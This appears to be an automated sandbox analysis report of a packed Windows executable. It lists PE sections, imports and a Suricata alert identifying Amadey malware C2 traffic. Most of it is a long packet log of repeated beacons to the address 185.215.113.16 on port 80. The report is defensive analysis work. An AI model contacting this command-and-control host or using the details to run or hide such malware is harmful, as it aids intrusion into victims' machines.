                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                          Sections

                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          0x10000x680000x2de00f7ea1c87b19d4f24283ea635c1a7fc7dFalse0.9974242166212534data7.981756657229513IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .rsrc0x690000x1e00x20067c27a9da4fdb15f1de8ffa0df298214False0.58203125data4.531214649543818IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .idata 0x6a0000x10000x200cc76e3822efdc911f469a3e3cc9ce9feFalse0.1484375data1.0428145631430756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          0x6b0000x2ad0000x2009fb5e742a4afb8be134e2e7e76b72840unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          mtnloani0x3180000x1a20000x1a1800a31e57591ee0480742fd59bbde0756bdFalse0.994482129491018data7.954149945480765IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          bcuuovzp0x4ba0000x10000x40048346f4a6e96239a2780085d5d621115False0.7392578125data5.88476992713561IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .taggant0x4bb0000x30000x220085cdaef9ef82a8f50af846f47133b00dFalse0.05170036764705882DOS executable (COM)0.5527501213916006IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                          Resources

                          NameRVASizeTypeLanguageCountryZLIB Complexity
                          RT_MANIFEST0x4b94840x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                          Imports

                          DLLImport
                          kernel32.dlllstrcpy

                          Possible Origin

                          Language of compilation systemCountry where language is spokenMap
                          EnglishUnited States

                          Network Behavior

                          Suricata IDS Alerts

                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                          2024-09-26T17:06:13.686528+02002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.455659185.215.113.1680TCP

                          Network Port Distribution

                          TCP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Sep 26, 2024 17:06:03.356292009 CEST5565080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:03.361310005 CEST8055650185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:03.361388922 CEST5565080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:03.361546040 CEST5565080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:03.366288900 CEST8055650185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:04.071353912 CEST8055650185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:04.071465015 CEST5565080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:04.073450089 CEST5565080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:04.078311920 CEST8055650185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:04.300441980 CEST8055650185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:04.301191092 CEST5565080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:04.409831047 CEST5565080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:04.410017014 CEST5565180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:04.416271925 CEST8055651185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:04.416361094 CEST5565180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:04.416510105 CEST5565180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:04.416826010 CEST8055650185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:04.416888952 CEST5565080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:04.422936916 CEST8055651185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:05.147222996 CEST8055651185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:05.147339106 CEST5565180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:05.148212910 CEST5565180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:05.152971029 CEST8055651185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:05.383308887 CEST8055651185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:05.383435965 CEST5565180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:05.487934113 CEST5565180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:05.488383055 CEST5565280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:05.493339062 CEST8055652185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:05.493386984 CEST8055651185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:05.493426085 CEST5565280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:05.493453026 CEST5565180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:05.493577003 CEST5565280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:05.498331070 CEST8055652185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:06.197068930 CEST8055652185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:06.197144985 CEST5565280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:06.197768927 CEST5565280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:06.202662945 CEST8055652185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:06.440093994 CEST8055652185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:06.440370083 CEST5565280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:06.550260067 CEST5565280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:06.550652981 CEST5565380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:06.555684090 CEST8055652185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:06.555699110 CEST8055653185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:06.555769920 CEST5565280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:06.555821896 CEST5565380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:06.556031942 CEST5565380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:06.560888052 CEST8055653185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:07.265211105 CEST8055653185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:07.265363932 CEST5565380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:07.266149998 CEST5565380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:07.270956039 CEST8055653185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:07.496052027 CEST8055653185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:07.496175051 CEST5565380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:07.612606049 CEST5565380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:07.612972975 CEST5565480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:07.617924929 CEST8055653185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:07.617950916 CEST8055654185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:07.618011951 CEST5565380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:07.618077040 CEST5565480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:07.618197918 CEST5565480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:07.622939110 CEST8055654185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:08.331146002 CEST8055654185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:08.331207037 CEST5565480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:08.332066059 CEST5565480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:08.336971045 CEST8055654185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:08.563980103 CEST8055654185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:08.564059019 CEST5565480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:08.675467968 CEST5565480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:08.675870895 CEST5565580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:08.680789948 CEST8055655185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:08.680876017 CEST8055654185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:08.680876017 CEST5565580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:08.680922985 CEST5565480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:08.681051970 CEST5565580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:08.685856104 CEST8055655185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:09.375256062 CEST8055655185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:09.375377893 CEST5565580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:09.376321077 CEST5565580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:09.381406069 CEST8055655185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:09.599627018 CEST8055655185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:09.599809885 CEST5565580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:09.741149902 CEST5565580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:09.741828918 CEST5565680192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:09.746525049 CEST8055655185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:09.746581078 CEST5565580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:09.746746063 CEST8055656185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:09.746822119 CEST5565680192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:09.758709908 CEST5565680192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:09.763534069 CEST8055656185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:10.474226952 CEST8055656185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:10.474325895 CEST5565680192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:10.475132942 CEST5565680192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:10.479958057 CEST8055656185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:10.709074974 CEST8055656185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:10.709383011 CEST5565680192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:10.815824032 CEST5565680192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:10.816246033 CEST5565780192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:10.822741985 CEST8055656185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:10.822827101 CEST5565680192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:10.822930098 CEST8055657185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:10.823013067 CEST5565780192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:10.823120117 CEST5565780192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:10.827923059 CEST8055657185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:11.549422026 CEST8055657185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:11.549602032 CEST5565780192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:11.551275969 CEST5565780192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:11.557446003 CEST8055657185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:11.780131102 CEST8055657185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:11.780282021 CEST5565780192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:11.899807930 CEST5565780192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:11.900474072 CEST5565880192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:11.905030966 CEST8055657185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:11.905160904 CEST5565780192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:11.905302048 CEST8055658185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:11.905431986 CEST5565880192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:11.905811071 CEST5565880192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:11.910676956 CEST8055658185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:12.620748997 CEST8055658185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:12.620853901 CEST5565880192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:12.623521090 CEST5565880192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:12.628367901 CEST8055658185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:12.857176065 CEST8055658185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:12.857306004 CEST5565880192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:12.972230911 CEST5565880192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:12.972635984 CEST5565980192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:12.977547884 CEST8055659185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:12.977672100 CEST5565980192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:12.977821112 CEST5565980192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:12.979079008 CEST8055658185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:12.979147911 CEST5565880192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:12.982796907 CEST8055659185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:13.686417103 CEST8055659185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:13.686527967 CEST5565980192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:13.687414885 CEST5565980192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:13.692265987 CEST8055659185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:13.933962107 CEST8055659185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:13.934036970 CEST5565980192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:14.050173998 CEST5565980192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:14.050558090 CEST5566080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:14.055362940 CEST8055660185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:14.055455923 CEST5566080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:14.055573940 CEST5566080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:14.055675983 CEST8055659185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:14.055727005 CEST5565980192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:14.060329914 CEST8055660185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:14.782094002 CEST8055660185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:14.782286882 CEST5566080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:14.784502029 CEST5566080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:14.789429903 CEST8055660185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:15.020087957 CEST8055660185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:15.020149946 CEST5566080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:15.128742933 CEST5566080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:15.129565001 CEST5566180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:15.134102106 CEST8055660185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:15.134183884 CEST5566080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:15.134429932 CEST8055661185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:15.134517908 CEST5566180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:15.134735107 CEST5566180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:15.139462948 CEST8055661185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:15.853360891 CEST8055661185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:15.853524923 CEST5566180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:15.854372978 CEST5566180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:15.859447002 CEST8055661185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:16.089590073 CEST8055661185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:16.089716911 CEST5566180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:16.206290960 CEST5566180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:16.206598997 CEST5566280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:16.211463928 CEST8055662185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:16.211580992 CEST5566280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:16.211677074 CEST5566280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:16.211767912 CEST8055661185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:16.211822033 CEST5566180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:16.216407061 CEST8055662185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:16.939333916 CEST8055662185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:16.939604044 CEST5566280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:16.940506935 CEST5566280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:16.945363045 CEST8055662185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:17.173333883 CEST8055662185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:17.173531055 CEST5566280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:17.284781933 CEST5566280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:17.285187960 CEST5566380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:17.290153980 CEST8055663185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:17.290282011 CEST5566380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:17.290383101 CEST8055662185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:17.290443897 CEST5566280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:17.290596008 CEST5566380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:17.295351028 CEST8055663185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:18.010824919 CEST8055663185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:18.010896921 CEST5566380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:18.011984110 CEST5566380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:18.016794920 CEST8055663185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:18.243854046 CEST8055663185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:18.244112015 CEST5566380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:18.347489119 CEST5566380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:18.348278046 CEST5566480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:18.352721930 CEST8055663185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:18.352840900 CEST5566380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:18.353096962 CEST8055664185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:18.353176117 CEST5566480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:18.353413105 CEST5566480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:18.358163118 CEST8055664185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:19.070374012 CEST8055664185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:19.070504904 CEST5566480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:19.071213007 CEST5566480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:19.075953007 CEST8055664185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:19.303478956 CEST8055664185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:19.303594112 CEST5566480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:19.409476995 CEST5566480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:19.409847021 CEST5566580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:19.415112972 CEST8055665185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:19.415126085 CEST8055664185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:19.415196896 CEST5566480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:19.415422916 CEST5566580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:19.415422916 CEST5566580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:19.420244932 CEST8055665185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:20.113703966 CEST8055665185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:20.113965034 CEST5566580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:20.114624977 CEST5566580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:20.120066881 CEST8055665185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:20.338655949 CEST8055665185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:20.338723898 CEST5566580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:20.449151039 CEST5566580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:20.449583054 CEST5566680192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:20.454499006 CEST8055665185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:20.454525948 CEST8055666185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:20.454639912 CEST5566580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:20.454695940 CEST5566680192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:20.454943895 CEST5566680192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:20.459681034 CEST8055666185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:21.163033962 CEST8055666185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:21.163176060 CEST5566680192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:21.168693066 CEST5566680192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:21.173520088 CEST8055666185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:21.562275887 CEST8055666185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:21.562402010 CEST5566680192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:21.675173998 CEST5566680192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:21.675581932 CEST5566780192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:21.680304050 CEST8055666185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:21.680326939 CEST8055667185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:21.680392981 CEST5566680192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:21.680417061 CEST5566780192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:21.680618048 CEST5566780192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:21.685412884 CEST8055667185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:22.387645006 CEST8055667185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:22.387908936 CEST5566780192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:22.388715029 CEST5566780192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:22.393654108 CEST8055667185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:22.619709015 CEST8055667185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:22.619755983 CEST5566780192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:22.722278118 CEST5566780192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:22.722676039 CEST5566880192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:22.727592945 CEST8055668185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:22.727606058 CEST8055667185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:22.727718115 CEST5566780192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:22.727746010 CEST5566880192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:22.727864981 CEST5566880192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:22.732552052 CEST8055668185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:23.436578989 CEST8055668185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:23.436806917 CEST5566880192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:23.438375950 CEST5566880192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:23.443329096 CEST8055668185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:23.667787075 CEST8055668185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:23.668025970 CEST5566880192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:23.873176098 CEST5566880192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:23.878395081 CEST8055668185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:23.878459930 CEST5566880192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:23.884083986 CEST5566980192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:23.889033079 CEST8055669185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:23.889101982 CEST5566980192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:23.895128012 CEST5566980192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:23.899938107 CEST8055669185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:24.628212929 CEST8055669185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:24.628281116 CEST5566980192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:24.630661011 CEST5566980192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:24.635482073 CEST8055669185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:25.041414022 CEST8055669185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:25.041485071 CEST5566980192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:25.144114971 CEST5566980192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:25.144624949 CEST5567080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:25.149317026 CEST8055669185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:25.149367094 CEST5566980192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:25.149408102 CEST8055670185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:25.149466991 CEST5567080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:25.149669886 CEST5567080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:25.154479980 CEST8055670185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:25.849009991 CEST8055670185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:25.849081993 CEST5567080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:25.849750996 CEST5567080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:25.854589939 CEST8055670185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:26.077857018 CEST8055670185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:26.078285933 CEST5567080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:26.190896034 CEST5567080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:26.191241980 CEST5567180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:26.196059942 CEST8055671185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:26.196738005 CEST8055670185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:26.196815014 CEST5567080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:26.196822882 CEST5567180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:26.196990013 CEST5567180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:26.201831102 CEST8055671185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:26.911773920 CEST8055671185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:26.911849022 CEST5567180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:26.912630081 CEST5567180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:26.917538881 CEST8055671185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:27.158252954 CEST8055671185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:27.158482075 CEST5567180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:27.268882036 CEST5567180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:27.269249916 CEST5567280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:27.274977922 CEST8055672185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:27.274992943 CEST8055671185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:27.275058985 CEST5567180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:27.275089025 CEST5567280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:27.275295019 CEST5567280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:27.280838013 CEST8055672185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:28.001151085 CEST8055672185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:28.001285076 CEST5567280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:28.002094030 CEST5567280192.168.2.4185.215.113.16
